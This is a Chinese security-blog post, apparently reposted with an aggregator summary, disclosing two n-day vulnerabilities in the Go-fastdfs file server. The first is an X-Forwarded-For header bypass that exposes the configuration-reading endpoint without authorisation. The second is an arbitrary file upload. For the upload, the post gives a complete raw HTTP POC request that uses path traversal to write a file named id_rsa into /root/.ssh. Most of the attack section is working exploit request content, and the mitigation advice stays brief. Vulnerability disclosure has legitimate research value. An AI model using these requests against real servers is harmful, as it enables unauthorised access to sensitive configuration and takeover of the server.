文章总结: Go-fastdfs系统存在两个严重安全漏洞:一是GetClientIp方法存在XFF头绕过漏洞,攻击者可未授权调用接口获取配置文件等敏感信息;二是upload接口存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器。文章提供了详细的漏洞复现步骤和POC代码,建议用户及时更新系统或采取安全措施防范攻击。
综合评分: 85
文章分类: 漏洞分析,漏洞POC,WEB安全
【Nday】Go-fastdfs 未授权+任意文件上传
原创
观止安全
观止安全
2025年12月13日 09:00
安徽
免责声明:本公众号所发的内容仅供学习用途使用,由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责!如有侵权,烦请告知,我们会立即删除!观止安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
- 未授权
Go-fastdfs GetClientIp方法存在XFF头绕过漏洞,攻击者通过漏洞可以未授权调用接口,获取配置文件等敏感信息
漏洞复现:
POC:
/group1/reload?action=get
调用读取配置接口,返回 ip 不允许访问
通过设置 X-Forwarded-For 就可以绕过接口调用限制
- 任意文件上传
Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器
POC:
POST /group1/upload HTTP/1.1Host: Content-Length: 892Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="file"; filename="id"Content-Type: application/octet-stream
test------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="scene"
default------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="filename"
id_rsa------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="output"
json2------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="path"
../../../../../root/.ssh------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="code"
------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="auth_token"
------WebKitFormBoundaryigj9M9EJykZc9u53Content-Disposition: form-data; name="submit"
upload------WebKitFormBoundaryigj9M9EJykZc9u53--
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:观止安全 观止安全《【Nday】Go-fastdfs 未授权+任意文件上传》